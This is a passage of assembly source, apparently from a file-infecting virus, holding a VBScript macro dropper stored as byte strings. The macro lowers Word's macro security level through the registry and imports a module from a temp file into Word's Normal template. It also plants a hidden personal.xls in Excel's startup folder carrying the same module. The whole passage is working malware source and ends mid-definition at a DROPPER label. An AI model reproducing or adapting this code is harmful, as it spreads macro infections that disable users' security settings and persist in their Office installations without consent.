DB 'word.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
||
DB 'word.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
||
DB 'Set maca = word.Application.NormalTemplate.VBProject.VBComponents', 0Dh, 0Ah
|
||
DB 'If maca.Item("Plexar").Name <> "Plexar" Then', 0Dh, 0Ah
|
||
DB 'maca.Import "c:\raxelp.$$$"', 0Dh, 0Ah
|
||
DB 'word.Application.NormalTemplate.Save', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'Set fso = CreateObject("Scripting.FileSystemObject")', 0Dh, 0Ah
|
||
DB 'Set excel = CreateObject("Excel.Application")', 0Dh, 0Ah
|
||
DB 'If ( excel <> "" ) Then', 0Dh, 0Ah
|
||
DB 'yyy = excel.Application.StartupPath & "\personal.xls"', 0Dh, 0Ah
|
||
DB 'If (fso.FileExists(yyy) = False) Then', 0Dh, 0Ah
|
||
DB 'excel.WorkBooks.Add.SaveAs yyy', 0Dh, 0Ah
|
||
DB 'excel.Application.ActiveWorkbook.VBProject.VBComponents.Import "c:\raxelp.$$$"', 0Dh, 0Ah
|
||
DB 'excel.ActiveWindow.Visible = Not -1', 0Dh, 0Ah
|
||
DB 'excel.Workbooks("personal.xls").Save', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
DB 'excel.Application.Quit', 0Dh, 0Ah
|
||
DB 'End If', 0Dh, 0Ah
|
||
Largo_MVBS EQU $-Macro_VBS
|
||
|
||
FHandle_DPE DD 00000000h
|
||
MHandle_DPE DD 00000000h
|
||
BaseMap_DPE DD 00000000h
|
||
|
||
DROPPER LABEL NEAR
|
||
|
||
DB |